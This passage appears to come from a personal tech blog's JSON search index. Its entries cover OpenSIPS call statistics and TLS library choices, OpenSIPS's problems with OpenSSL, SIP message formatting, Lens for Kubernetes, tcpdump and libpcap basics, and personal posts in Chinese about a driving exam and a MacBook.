update_stat_series(\u0026#34;10m-avg\u0026#34;, \u0026#34;ACD_10m$param(3)\u0026#34;, $var(total_duration)); update_stat_series(\u0026#34;1h-avg\u0026#34;, \u0026#34;ACD_1h$param(3)\u0026#34;, $var(total_duration)); } And in case of a failure, we update the corresponding statistics:\nevent_route[E_ACC_MISSED_EVENT] { route(calculate_stats_failure, $param(code), \u0026#34;\u0026#34;); route(calculate_stats_failure, $param(code), $param(customer)); } route[calculate_stats_failure] { # expects: # - param 1: failure code # - param 2: statistic identifier; global is empty string update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;ASR$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;ASR_10m$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;ASR_1h$param(3)\u0026#34;, -1); if ($param(1) == \u0026#34;486\u0026#34; || $param(1) == \u0026#34;408\u0026#34;) { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;NER$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;NER_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;NER_1h$param(3)\u0026#34;, 1); } else { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;NER$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;NER_10m$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;NER_1h$param(3)\u0026#34;, -1); } if ($(param(1){s.int}) \u0026gt; 499) { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;CCR$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;CCR_10m$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;CCR_1h$param(3)\u0026#34;, -1); } else { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;CCR$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;CCR_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;CCR_1h$param(3)\u0026#34;, 1); } } And we are all set – all you have to do is to run traffic through your server, query the statistics (over MI) at your desired pace (such as every minute), and plot them nicely in a graph to improve your monitoring experience .\nPossible enhancements There is currently no way of persisting these statistics over a restart – this means that every time you restart, the new statistics have to be re-computed, resulting in possible misleading results. In the future, it would be nice if we could provide some sort of persistent storage for them.All statistics are currently local, although it might be possible aggregate values across multiple servers using some scripting + cluster broadcast messages from script. Ideally, we shall implement this in an automatic fashion using the clusterer module.Finally, although there are currently only three algorithms supported (accumulate, percentage and average), more can be added quite easily – we shall do that in future versions.Enjoy your new statistics!\n","permalink":"https://wdd.js.org/opensips/blog/call-stat/","summary":"早期1x和2x版本的OpenSIPS,统计模块只有两种模式,一种时计算值,另一种是从运行开始的累加值。而无法获取比如说最近一分钟,最近5分钟,这样的基于一定周期的统计值,在OpenSIPS 3.2上,提供了新的解决方案。\n原文:https://blog.opensips.org/2021/02/02/improved-series-based-call-statistics-using-opensips-3-2/\nReal-time call statistics is an excellent tool to evaluate the quality and performance of your telephony platform, that is why it is very important to expose as many statistics as possible, accumulated over different periods of time.OpenSIPS provides an easy to use interface that exposes simple primitives for creating, updating, and displaying various statistics, both well defined as well as tailored to your needs. However, the current implementation comes with a limitation: statistics are gathered starting from the beginning of the execution, up to the point they are read.","title":"Improved series-based call statistics using OpenSIPS 3.2"},{"content":" OpenSIPS和OpenSSL之间的集成总是存在各种个样的问题。我之前就遇到死锁的问题,opensips CPU cpu占用很高。但是不再处理SIP消息。最终排查下来,是和OpenSSL有关。 深层次的原因,是因为OpenSIPS是个多进程的程序,而OpenSSL主要是面向多线程的程序。 在OpenSIPS3.2版本上,官方团队列出了几个OpenSSL的替代品,并进行优劣对比,最终选择一个比较好的方案。 我们一起来看看吧。\nFor the purpose of providing secure SIP communication over the TLS protocol, OpenSIPS uses the OpenSSL library, the most popular TLS implementation across the Internet. However, integrating OpenSSL with OpenSIPS has posed a series of challenges starting with OpenSSL version 1.1.0, and has caused quite a few bugs and crashes since then, as presented in more detail in this article.As such, for the new OpenSIPS 3.2 version, we have finally decided to provide support for an additional TLS library, as an alternative to OpenSSL. In this article, we are going to take a look at the options we have explored and the criteria and factors that we used to choose a candidate.\nIssues with OpenSSL Even though up to this point, we have been able to solve the encountered issues, new problems continue to emerge and there are still ongoing reports and Github tickets on this topic. The main reason for this, in short, is that OpenSSL is designed with multi-threaded applications in mind, and is incompatible with certain design principles of a multi-process application like OpenSIPS. OpenSSL is not intended to be used in an environment where TLS connections can be shared between multiple worker processes.\nRequirements for a new TLS library First, we considered the following general requirements for the new TLS library to use in OpenSIPS:\ncross-platform support, availability for many operating systems (ideally, through the default package repository); comprehensive, up to date documentation; support for the the latest and widely used protocols and encryption algorithms; mature, lively project and good adoption. But more precisely, in order for a TLS library to be viable for OpenSIPS, in the light of our multi-process architecture constraints, we specifically look for:\nthread-safe design (in OpenSIPS we only have a single thread per process, but we do concurrently access the library from multiple processes nonetheless); hooks for providing custom memory allocation functions (instead of the system malloc() family), to make sure the TLS connection contexts are allocated in OpenSIPS shared memory, similarly to CRYPTO_set_mem_functions() in OpenSSL; hooks for providing custom locking mechanisms (primitives like create, lock, unlock mutex) in order to synchronize access between processes to the shared TLS connection contexts, similarly to the obsolete CRYPTO_set_locking_callback() in OpenSSL; no use of specific, per-thread memory zone storage mechanisms like Thread Local Storage (which OpenSSL adopted in version 1.1.1, and caused further crashes in OpenSIPS). Candidates In this section we are going to list the top candidates that we have identified in our search for the best TLS implementation that fits OpenSIPS and provide a short conclusion on the findings on each one.\nOpenSSL forks Even though prominent OpenSSL forks like LibreSSL (forked by OpenBSD project from OpenSSL 1.0.1g) or _BoringSSL (forked by Google), seem good options from other perspectives (like features or availability), _they fail to bring or keep from old OpenSSL, the required mechanisms for properly integrating with OpenSIPS. LibreSSL for example has dropped both CRYPTO_set_mem_functions() and CRYPTO_set_locking_callback().\nGnuTLS Popular among free and open source software, GnuTLS’s documentation on thread safety does not seem to indicate that it is safe to share TLS session objects between threads. Moreover, the library uses hard-coded mutex implementations (e.g., pthreads on GNU/Linux and CriticalSection on Windows) for several aspects, like random number generation (this operation has led to issues in OpenSSL). In terms of custom application hooks, GnuTLS does offer **gnutls_global_set_mutex() **for locking, but since version 3.3.0 has dropped gnutls_global_set_mem_functions() for memory allocation, which is a must for OpenSIPS shared memory.\nMbed TLS Formerly known as PolarSSL, MbedTLS is a library designed for embedded devices and for the purpose of better integration with different systems, offers abstraction layers for memory allocation and threading mechanisms. OpenSIPS can take advantage of this features by installing its own handlers via mbedtls_platform_set_calloc_free() and mbedtls_threading_set_alt(). The downside in this case is that the customisations are only available if the library is compiled with specific flags, which are not enabled by default. This would mean that TLS in OpenSIPS would not properly work with the library installed directly from packages, which is not a desirable approach.\nWolfSSL Previously called _yaSSL _/ CyaSSL, WolfSSL is a lightweight TLS library aimed at embedded devices. It has achieved high distribution volumes on all systems nevertheless, due to formerly being bundled with MySQL, as the default TLS implementation. As it is the case with Mbed TLS, the library’s high portability design can be exploited for better integration with OpenSIPS. WolfSSL provides a hook for setting custom memory allocation functions through wolfSSL_SetAllocators() but does not offer a way to change the locking mechanism at runtime (unless compiled differently). However, the documentation and forum discussions on this matter, suggest that as long as access to shared connection contexts is synchronised at the user application level, the library will not internally acquire any mutexes and no concurrency issues will arise.\nFinal choice Based on our evaluation of the available TLS libraries, WolfSSL seems to be a good TLS implementation overall and the most appropriate to work with OpenSIPS’s multi-process design and constraints. In conclusion, starting with OpenSIPS 3.2, we plan on providing the possibility of choosing between WolfSSL and OpenSSL for the TLS needs in OpenSIPS.\n参考:https://blog.opensips.org/2021/02/11/exploring-ssl-tls-libraries-for-opensips-3-2/\n","permalink":"https://wdd.js.org/opensips/blog/opensips3-tls/","summary":"OpenSIPS和OpenSSL之间的集成总是存在各种个样的问题。我之前就遇到死锁的问题,opensips CPU cpu占用很高。但是不再处理SIP消息。最终排查下来,是和OpenSSL有关。 深层次的原因,是因为OpenSIPS是个多进程的程序,而OpenSSL主要是面向多线程的程序。 在OpenSIPS3.2版本上,官方团队列出了几个OpenSSL的替代品,并进行优劣对比,最终选择一个比较好的方案。 我们一起来看看吧。\nFor the purpose of providing secure SIP communication over the TLS protocol, OpenSIPS uses the OpenSSL library, the most popular TLS implementation across the Internet. However, integrating OpenSSL with OpenSIPS has posed a series of challenges starting with OpenSSL version 1.1.0, and has caused quite a few bugs and crashes since then, as presented in more detail in this article.As such, for the new OpenSIPS 3.","title":"Exploring SSL/TLS libraries for OpenSIPS 3.2"},{"content":"科目二倒库和四项练的差不多了,决定去参加考试,考试虽然一波三折,但结果还是好的,一次通过了\n考场熟悉 考场倒库有14各区,没什么好讲的。 四项有4各环线,每个环线上有两个考试线路,所以一共是8条线路 务必看懂各种符号的含义,例如曲线,侧方, 直角与坡道 【重点】当你知道你自己在那条线上考试之后,务必对照着线路图,将四项的顺序以及位置牢记于心。虽然路上会有牌子指示下一项内容是什么,但是考试的时候,由于视线等各种原因可能不会去在意。也有人,看到前面是直角,就以为是前面是直角转弯,结果到了真正直角转弯的位置,却没有做直角相关的操作,导致考试失败。 例如,当你被选择到8号线的四项时,你到了7-8待考等待区后,等待自己的考试车。在等待过程中按照平面图,可以发现,离待考最近的起点之后,8号线,第一个考试项目侧方停车,然后是直角转弯,接着是S弯,最后是坡道。\n模拟考相关 模拟的费用以及项目内容 模拟的费用是360,包含一下内容\n倒车入库120,可以倒库3次 四项有八条线路,每个线路各跑一次 四项的车和倒库的车是不同的,这点需要注意。\n模拟考有用吗? 我觉的是有用的\n一般驾校只有一两条线路,实际考场有8条线路。每条线路你都可以跑一次,从1号线到8号线。跑过这8条线,你会基本知道自己四项中哪些项目比较容易出错。可以针对性加强。另外也可以找找坡道的点位。 跑模拟四项的时候,有个教练会坐在副驾驶上。他会不断的催促你,此时你千万不要让他的催促导致你连续的出错,进而影响到你考试的心态。你是交了钱的,离合和油门都在你这边,教练再催,也是没办法让车加速的。你不要怂。【注意:在真实考试时,副驾驶是没有人的。】 教练为什么要不停的催你,因为你越快跑完8条线路,他就可以接更多的学员,他手里的小票就越多,提成就越多。当你模拟完8条线路,教练会让你再买几条线路。线路其实是可以按条买的,每条线跑一次30块。真是车轮一转,家财万贯。车轮一响,黄金万两啊。 虽然倒库的车库有14个,但是你模拟的那个车库,其实有极大的可能就是你真实考试的那个车库。这样你就可以提前熟悉一下车库的点位。我比较菜,模拟三次的倒库都倒失败了。但是我从三次失败中也学到了自己失败的原因。从而在真实考试时成功通过。倒库如果你三次都失败了,也可以单独买的。倒3次60块。倒6次120块。但是这就不建议再花钱了。你应该记住自己的错误的点。比如是那边压线了,然后回到驾校,和你的教练沟通一下。驾校的教练会给你更加有用的建议。另外你务必要记住自己是几号库,你只要和驾校教练沟通一下,他都知道这个库位的处理细节的。 如果我没有模拟考过,很可能我科目二第一次会挂,然后还要花时间去搞这件事。如果能用钱解决的事情,我更希望能节省一些时间。 心态 考试的心态很重要,和我一起参见考试的一个同学。他没有参加模拟考,但是他在考试中倒库一把就倒进去了。我认为他是比较牛逼的。但是有可能他骄傲了,挂在了几个转向灯和坡道定点上。侧方停车时,出库居然忘记打转向灯了。\n也有人忘记系安全带了。\n很多小的点,也很容易的点。在驾校都练的很熟练,但是一到考场,就总是丢三落四的忘记。为什么会有这种场景的。\n因为心态变了。\n","permalink":"https://wdd.js.org/posts/2021/01/","summary":"科目二倒库和四项练的差不多了,决定去参加考试,考试虽然一波三折,但结果还是好的,一次通过了\n考场熟悉 考场倒库有14各区,没什么好讲的。 四项有4各环线,每个环线上有两个考试线路,所以一共是8条线路 务必看懂各种符号的含义,例如曲线,侧方, 直角与坡道 【重点】当你知道你自己在那条线上考试之后,务必对照着线路图,将四项的顺序以及位置牢记于心。虽然路上会有牌子指示下一项内容是什么,但是考试的时候,由于视线等各种原因可能不会去在意。也有人,看到前面是直角,就以为是前面是直角转弯,结果到了真正直角转弯的位置,却没有做直角相关的操作,导致考试失败。 例如,当你被选择到8号线的四项时,你到了7-8待考等待区后,等待自己的考试车。在等待过程中按照平面图,可以发现,离待考最近的起点之后,8号线,第一个考试项目侧方停车,然后是直角转弯,接着是S弯,最后是坡道。\n模拟考相关 模拟的费用以及项目内容 模拟的费用是360,包含一下内容\n倒车入库120,可以倒库3次 四项有八条线路,每个线路各跑一次 四项的车和倒库的车是不同的,这点需要注意。\n模拟考有用吗? 我觉的是有用的\n一般驾校只有一两条线路,实际考场有8条线路。每条线路你都可以跑一次,从1号线到8号线。跑过这8条线,你会基本知道自己四项中哪些项目比较容易出错。可以针对性加强。另外也可以找找坡道的点位。 跑模拟四项的时候,有个教练会坐在副驾驶上。他会不断的催促你,此时你千万不要让他的催促导致你连续的出错,进而影响到你考试的心态。你是交了钱的,离合和油门都在你这边,教练再催,也是没办法让车加速的。你不要怂。【注意:在真实考试时,副驾驶是没有人的。】 教练为什么要不停的催你,因为你越快跑完8条线路,他就可以接更多的学员,他手里的小票就越多,提成就越多。当你模拟完8条线路,教练会让你再买几条线路。线路其实是可以按条买的,每条线跑一次30块。真是车轮一转,家财万贯。车轮一响,黄金万两啊。 虽然倒库的车库有14个,但是你模拟的那个车库,其实有极大的可能就是你真实考试的那个车库。这样你就可以提前熟悉一下车库的点位。我比较菜,模拟三次的倒库都倒失败了。但是我从三次失败中也学到了自己失败的原因。从而在真实考试时成功通过。倒库如果你三次都失败了,也可以单独买的。倒3次60块。倒6次120块。但是这就不建议再花钱了。你应该记住自己的错误的点。比如是那边压线了,然后回到驾校,和你的教练沟通一下。驾校的教练会给你更加有用的建议。另外你务必要记住自己是几号库,你只要和驾校教练沟通一下,他都知道这个库位的处理细节的。 如果我没有模拟考过,很可能我科目二第一次会挂,然后还要花时间去搞这件事。如果能用钱解决的事情,我更希望能节省一些时间。 心态 考试的心态很重要,和我一起参见考试的一个同学。他没有参加模拟考,但是他在考试中倒库一把就倒进去了。我认为他是比较牛逼的。但是有可能他骄傲了,挂在了几个转向灯和坡道定点上。侧方停车时,出库居然忘记打转向灯了。\n也有人忘记系安全带了。\n很多小的点,也很容易的点。在驾校都练的很熟练,但是一到考场,就总是丢三落四的忘记。为什么会有这种场景的。\n因为心态变了。","title":"南京尧新科目二考试考试回顾"},{"content":"我的macbook是2017买的, 使用到今天大概1204天。\n最初的使用体验是\n触摸板很灵敏 屏幕很高清 系统很流畅 三年中出现过的问题\n键盘中的几个按键出现过问题,按键不灵敏。17年是用的蝴蝶键盘,这个键盘问题很多。最新版已经换成了剪刀脚键盘了。 屏幕老化,屏幕的四周出现淡红色的红晕,但是不影响使用。 如果不充电的情况下,掉电蛮快的,而且有时候电量还很多,就自动关机。 现在的感觉:\n触摸板我基本不会用了,因为大部分时间我都是用键盘可以搞定一切。因为我用了vim编辑器。 我也不再使用macbook pro自带的键盘,因为真是不好用。所有的笔记本键盘,除了thinkpad的键盘。都不太好用,不适合长时间打字。所以我用了外接的静电容键盘。 无论多么好的自带键盘,都比不过外接的键盘,毕竟是专业的。当然除非你经常初查或者移动,外接键盘真是非常值得入手。 关于下一台电脑:下一台电脑我会等待M2芯片, macbook pro或则是macbook mini, 这个我还没想好。我对命令行以及相关unix有着很大的依赖。即使用ubuntu, 我也不可能再使用windows。\n","permalink":"https://wdd.js.org/posts/2020/12/kxpswu/","summary":"我的macbook是2017买的, 使用到今天大概1204天。\n最初的使用体验是\n触摸板很灵敏 屏幕很高清 系统很流畅 三年中出现过的问题\n键盘中的几个按键出现过问题,按键不灵敏。17年是用的蝴蝶键盘,这个键盘问题很多。最新版已经换成了剪刀脚键盘了。 屏幕老化,屏幕的四周出现淡红色的红晕,但是不影响使用。 如果不充电的情况下,掉电蛮快的,而且有时候电量还很多,就自动关机。 现在的感觉:\n触摸板我基本不会用了,因为大部分时间我都是用键盘可以搞定一切。因为我用了vim编辑器。 我也不再使用macbook pro自带的键盘,因为真是不好用。所有的笔记本键盘,除了thinkpad的键盘。都不太好用,不适合长时间打字。所以我用了外接的静电容键盘。 无论多么好的自带键盘,都比不过外接的键盘,毕竟是专业的。当然除非你经常初查或者移动,外接键盘真是非常值得入手。 关于下一台电脑:下一台电脑我会等待M2芯片, macbook pro或则是macbook mini, 这个我还没想好。我对命令行以及相关unix有着很大的依赖。即使用ubuntu, 我也不可能再使用windows。","title":"macbook pro 使用三年后的感受"},{"content":" generic-message = start-line *message-header CRLF [ message-body ] start-line = Request-Line / Status-Line 其中在rfc2543中规定\nCR = %d13 ; US-ASCII CR, carriage return character LF = %d10 ; US-ASCII LF, line feed character 项目 十进制 字符串表示 CR 13 \\r LF 10 \\n 也就是说在一个SIP消息中\nheadline\\r\\n key:v\\r\\n \\r\\n some_body\\r\\n 所以CRLF就是 \\r\\n 参考 https://tools.ietf.org/html/rfc3261 https://tools.ietf.org/html/rfc2543 ","permalink":"https://wdd.js.org/opensips/ch3/sip-crlf/","summary":" generic-message = start-line *message-header CRLF [ message-body ] start-line = Request-Line / Status-Line 其中在rfc2543中规定\nCR = %d13 ; US-ASCII CR, carriage return character LF = %d10 ; US-ASCII LF, line feed character 项目 十进制 字符串表示 CR 13 \\r LF 10 \\n 也就是说在一个SIP消息中\nheadline\\r\\n key:v\\r\\n \\r\\n some_body\\r\\n 所以CRLF就是 \\r\\n 参考 https://tools.ietf.org/html/rfc3261 https://tools.ietf.org/html/rfc2543 ","title":"SIP消息格式CRLF"},{"content":"下载安装 Lens-4.0.4.dmg\n添加集群 在k8s master 节点上使用输入下面的指令,** 将输出内容复制一下**\nkubectl config view --minify --raw 选择Fiel \u0026gt; Add cluster 粘贴 集群就显示出来了 ","permalink":"https://wdd.js.org/posts/2020/12/ai1lnu/","summary":"下载安装 Lens-4.0.4.dmg\n添加集群 在k8s master 节点上使用输入下面的指令,** 将输出内容复制一下**\nkubectl config view --minify --raw 选择Fiel \u0026gt; Add cluster 粘贴 集群就显示出来了 ","title":"lens k8s IDE"},{"content":" In order to provide secure SIP communication over TLS connections, OpenSIPS uses the OpenSSL library, probably the most widely used open-source TLS \u0026amp; SSL library across the Internet. The fact that it is so popular and largely used makes it more robust, therefore a great choice to enforce security in a system! That was the reason it was chosen to be used in OpenSIPS in the first place. However, being designed as a multi-threaded library, while OpenSIPS is a multi-process application, integrating it was not an easy task. Furthermore, maintaining it was not trivial either. And the major changes in the OpenSSL library within the last couple of years have proven that. Once the library maintainers decided to have a more robust thread-safe approach, things started to break in OpenSIPS. Hence the numerous issues reported withing the last couple of years related to SSL bugs and crashes. The purpose of this post is to present you the challenges we faced, and how we dealt with them. This article describes the way OpenSSL, a multi-threaded designed library, was designed to work in OpenSIPS, a multi-process application, and what was the journey of maintaining the code by adapting to the changes throughout the years in the OpenSSL library.\nOpenSSL是个多线程的程序, OpenSIPS是个多进程的程序,两者沟通比较难 OpenSSL的大版本升级,有很大的可能性导致OpenSIPS也出问题 在github上有很多的issue都是关于OpenSSL和OpenSIPS [BUG] Deadlock in libssl/libcrypto #1767 https://github.com/OpenSIPS/opensips/issues/1858 Original design The initial design and implementation of TLS support in OpenSIPS was done in 2003. Back then OpenSSL was releasing revision 0.9.6. That’s the version that we have used for the original design and implementation.OpenSIPS is a multi-process server, that is able to handle SIP requests or replies in multiple processes, in parallel. When a message is received it is “assigned” to any of its free processes, that is responsible of the entire processing of that message. Any of these messages might decide, based on the routing logic, that the request has to be forwarded to the next hop using TLS. This means that any OpenSIPS process worker needs to be able to forward a message using SSL/TLS connections. And naturally, since all these processes run simultaneously, multiple processes can decide to forward the messages to the same TLS destination, raising various consistency concerns.In terms of design, there were three possible ways of ensuring consistency in this multi-process environment:\nEach process has its own SSL/TLS connection towards each destination. This means that if you have N workers and M destinations, your OpenSIPS server will have to maintain NxM connections. That’s something we should avoid. Map each SSL/TLS connection with a worker, and only that worker is allowed to communicate with that endpoint. When a different process has to forward a message to a specific endpoint, it will first send the message/job to the designated worker, which forwards it down to the next hop. Although this looks OK, it involves an extra layer or inter-process communication, for the job dispatching, and it is also prone to scalability issues (for example when the destination is a TLS trunk). Keep a single SSL/TLS connection to each destination throughout all the processes, and make sure there’s a mutual concurrent access to it. This seems to be the most elegant solution, as your SIP interconnections will always see a single TLS connection towards your server. However, ensuring mutual access to the connection is not that trivial, as you will see throughout this article. Nevertheless, since in OpenSIPS we need to address both scalability and ease interconnection with other SIP endpoints, we decided to implement solution number 3.\nInitial Implementation Although even back then it was advertised as a multi-threaded library, OpenSSL was exposing hooks to use it in a multi-process environment:\nCRYPTO_set_mem_functions() hook could be used to have the library use a custom memory allocator. We set this function to make sure OpenSSL allocates the SSL context in a shared memory, so that it can be accessed by any process **CRYPTO_set_id_callback() **was used to determine the thread that OpenSSL was running into. We used this callback to indicate that the “thread” was actually a process, and each of them has its own id, namely the Process ID (PID) CRYPTO_set_locking_callback() was exposing hooks to perform create, lock, unlock and delete using “user” specified locking mechanisms. Using this function we were able to “guard” the SSL shared context (allocated in our shared memory) using OpenSIPS specific multi-process shared locking mechanisms. That being said, we had all the ingredients to implement our chosen solution using OpenSSL, all we had to do was to glue them together. This is how the first implementation of SSL/TLS communication appeared in OpenSIPS. And it worked out just great throughout the years, up until OpenSSL version (including) 1.0.2.\nOpenSSL 1.1.0 new threading API The turning point On 25th of August 2016, when OpenSSL 1.1.0, was released, the OpenSSL team decided to implement a new threading API. In order to provide a nicer usage experience to multi-threaded applications that were using the OpenSSL libraries, they dropped the previously used threading mechanism and replaced it with an their own (hardcoded) implementation using pthreads (for Linux). This means that we could no longer use the CRYPTO_set_locking_callback() hooks, as they became obsolete.Since we were still allocating SSL contexts in shared memory, the locking mechanisms (i.e. pthread mutex structures) were also allocated in shared memory. Therefore, when OpenSSL was using them to guard the shared context, it was actually still using a “shared” memory, therefore the other processes were able to see that the lock/pthread mutex is acquired, resulting (in theory) in a successful mutual exclusion to the shared context.\nThe issue In practice, however, this resulted in a deadlock (see tickets #1590 #1755 , #1767). Although in general it was working fine, the problem appears when there’s a contention trying to acquire the pthread mutex from two different processes at the same time. Imagine process P1 and P2 trying to acquire mutex M in parallel: P1 gets first and acquires M; P2 then tries to acquire it – because M is in shared memory, it detects that M is already acquired (by P1), thus it blocks waiting for it to be released. When P1 finishes the processing, it releases M. However, due to the fact that pthreads by default is not meant to be shared between processes, P2 is not informed that M was released, thus remaining stuck. This was a problem very hard to debug, because when a process gets stuck, the first thing to do is to run a trap (opensipsctl trap) and check which process is blocked. However, when running trap gdb is executed on each OpenSIPS process, therefore each process is “interrupted” to do a GDB dump. Therefore our trap command would actually awake P2, make it re-evaluate the status of M, and basically unblocking the process and “fixing” the “deadlock”.\nThe solution Luckily, after a lot of tests and brainstorming, we managed to pinpoint the issue. The fix was quite simple – all we had to do was to set the PTHREAD_PROCESS_SHARED attribute to the pthread shared mutex. However, these mutexes are encapsulated in the openssl library, and there’s no hooks to tune them. After trying to pick some brains from the OpenSSL team, we realized that they are not interested in supporting that, therefore we had to take this issue in our own hands. That’s when we used a trick to overload the **pthread_mutex_init() **and **pthread_rwlock_init() **with our own implementation, that was also setting the shared attribute. And our SSL/TLS implementation started to work again.\nOpenSSL 1.1.1 new challenges New crashes Once with the OpenSSL 1.1.1 release on 11th of September 2018, new issues started to appear. Due to the fact that the OpenSSL team was trying to make their code base even more thread friendly (without considering the multi-process applications effects), they started to move most of their internal objects in TLS (thread local storage) memory zones. Although OpenSIPS was still allocating OpenSSL contexts in shared memory, these were stored in some locations where only one thread have access. Mixing the two memory management mechanisms resulted in several, unexpected crashes in the SSL library (see ticket #1799).\nFixing attempts After reading the OpenSSL library code and understanding the problem, our first idea was to implement a thread local storage that was compatible with multiple processes. This was our first attempt to fix the issue: overwrite the pthread_key_create(), pthread_getspecific() and pthread_setspecific() functions, similarly to the solution we had for OpenSSL 1.1.0 issues, to make them multi-process aware. Unfortunately our solution failed because of two reasons: although the library was no longer crashing, hence the memory operations were now valid, most of the concurrent connections were rejected (only 2 out of 10 SSL accepts were passing through). So this indicated us that there are still some issues with the internal data – although it is now accessible, most likely there is no concurrent access to it, resulting in unexpected behavior. A second issue with this approach was that overwriting the thread local storage implementation was not only done for the OpenSSL library, but for all the other libraries that were used by OpenSIPS. And since those libraries most likely do not use OpenSIPS managed memory, this might introduce bugs in other libraries – therefore we had to drop this solution.The second attempt to fix this issue came from inspecting the stack trace of the crashes, combined with vitalikvoip‘s suggestion, which were indicating that the problem was within the pseudo random-number generator (RAND_DRBG_bytes()). Therefore we proceeded by using the RAND_set_rand_method() hooks to guard the process of random numbers generators. Although this stopped the crashes, connections were still not properly accepted (again, 8 out of 10 were rejected), so we were back to square one.\nFinal fix Since the problem was not sorted out, we started to dig more into OpenSSL thread safety considerations and discussions (see OpenSSL ticket #2165), and try to understand how these translate to process safety. These made us wonder if it is OK to have a SSL_CTX (the context that manages what certificates, ciphers and other settings are to be used for new connections) shared among all processes. Therefore our next attempt to fix this issue was to duplicate the context (not the connection context, but the global context of SSL) in each process, and use each process’ context to create new connections. And Voillà, OpenSIPS started to accept all the connections, without any issues!After running a set of tests, both by us and our community, we concluded that the issue was the fact that the global SSL context was shared among OpenSIPS processes. Unfortunately this was not a diagnose that we could have come up with easily, due to the fact that this was working just fine up until version 1.1.1, and there were no indications in the OpenSSL documentation that this behavior has changed. Hence, the long-term process of solving this issue.\nConclusions As described throughout the article, running OpenSSL in a multi-process environment, with a context that is shared among multiple processes, is definitely doable. However, without support from the library itself (such as offering locking and memory allocations hooks and providing exhaustive documentation), it becomes more and more complicated to maintain the current implementation. That’s why in the future we are are planning to look into different alternatives for TLS (i.e. more multi-process friendly libraries).But until then, you can use OpenSIPS with the latest OpenSSL TLS implementation without any issues!Many thanks to vitalikvoip and danpascu for their valuable input on the latest matters, as well as to the whole OpenSIPS core team for all the brainstorming sessions for these issues (and not only :)). Although they were not easy to solve, it was definitely a lot of fun dealing with them.If you want to find out more information regarding this topic (and not only), make sure you do not miss this year’s OpenSIPS Summit on 5th-8th May 2020, in Amsterdam, Netherlands.\n","permalink":"https://wdd.js.org/opensips/blog/openssl-opensips/","summary":"In order to provide secure SIP communication over TLS connections, OpenSIPS uses the OpenSSL library, probably the most widely used open-source TLS \u0026amp; SSL library across the Internet. The fact that it is so popular and largely used makes it more robust, therefore a great choice to enforce security in a system! That was the reason it was chosen to be used in OpenSIPS in the first place. However, being designed as a multi-threaded library, while OpenSIPS is a multi-process application, integrating it was not an easy task.","title":"The OpenSIPS and OpenSSL journey"},{"content":"perl: warning: Setting locale failed. perl: warning: Please check that your locale settings: LANGUAGE = (unset), LC_ALL = (unset), LC_CTYPE = \u0026#34;UTF-8\u0026#34;, LANG = \u0026#34;en_US.UTF-8\u0026#34; are supported and installed on your system. perl: warning: Falling back to the standard locale (\u0026#34;C\u0026#34;). add in .bashrc\nexport LANG=en_US.UTF-8 export LANGUAGE=en_US.UTF-8 export LC_COLLATE=C export LC_CTYPE=en_US.UTF-8 source ~/.bashrc\n","permalink":"https://wdd.js.org/posts/2020/12/setting-locale-failed/","summary":"perl: warning: Setting locale failed. perl: warning: Please check that your locale settings: LANGUAGE = (unset), LC_ALL = (unset), LC_CTYPE = \u0026#34;UTF-8\u0026#34;, LANG = \u0026#34;en_US.UTF-8\u0026#34; are supported and installed on your system. perl: warning: Falling back to the standard locale (\u0026#34;C\u0026#34;). add in .bashrc\nexport LANG=en_US.UTF-8 export LANGUAGE=en_US.UTF-8 export LC_COLLATE=C export LC_CTYPE=en_US.UTF-8 source ~/.bashrc","title":"perl: warning: Setting locale failed."},{"content":"使用触摸板,可以左右滑动,来左右滚动只能部分显示的页面。但是在用鼠标的时候,由于鼠标滚轮只能上下滚动页面,所以不太方便。\n此时,你可以按住shift + 滚动鼠标滚轮,来实现左右滚动页面\n","permalink":"https://wdd.js.org/posts/2020/12/yor2t9/","summary":"使用触摸板,可以左右滑动,来左右滚动只能部分显示的页面。但是在用鼠标的时候,由于鼠标滚轮只能上下滚动页面,所以不太方便。\n此时,你可以按住shift + 滚动鼠标滚轮,来实现左右滚动页面","title":"Get: shift + 鼠标滚轮 左右滚动页面"},{"content":"ethereal-tcpdump.pdf\n","permalink":"https://wdd.js.org/network/hhlfi1/","summary":"ethereal-tcpdump.pdf","title":"tcpdump filters"},{"content":"libpcap-tutorial.pdf\n","permalink":"https://wdd.js.org/network/ivzphz/","summary":"libpcap-tutorial.pdf","title":"libpcap tutorial"},{"content":"tcpdump-zine.pdf\n","permalink":"https://wdd.js.org/network/yscigi/","summary":"tcpdump-zine.pdf","title":"tcpdump zine"},{"content":"准备条件 有gcc编译器 安装libpcap包 1.c 试运行 #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;pcap.h\u0026gt; int main(int argc, char *argv[]) { char *dev = argv[1]; printf(\u0026#34;Device: %s\\n\u0026#34;, dev); return(0); } gcc ./1.c -o 1.exe -lpcap demo-libpcap git:(master) ✗ ./1.exe eth0 Device: eth0 第一个栗子非常简单,仅仅是测试相关的库是否加载正确\n2.c 获取默认网卡名称 参考 http://www.tcpdump.org/pcap.html ","permalink":"https://wdd.js.org/network/uq5cii/","summary":"准备条件 有gcc编译器 安装libpcap包 1.c 试运行 #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;pcap.h\u0026gt; int main(int argc, char *argv[]) { char *dev = argv[1]; printf(\u0026#34;Device: %s\\n\u0026#34;, dev); return(0); } gcc ./1.c -o 1.exe -lpcap demo-libpcap git:(master) ✗ ./1.exe eth0 Device: eth0 第一个栗子非常简单,仅仅是测试相关的库是否加载正确\n2.c 获取默认网卡名称 参考 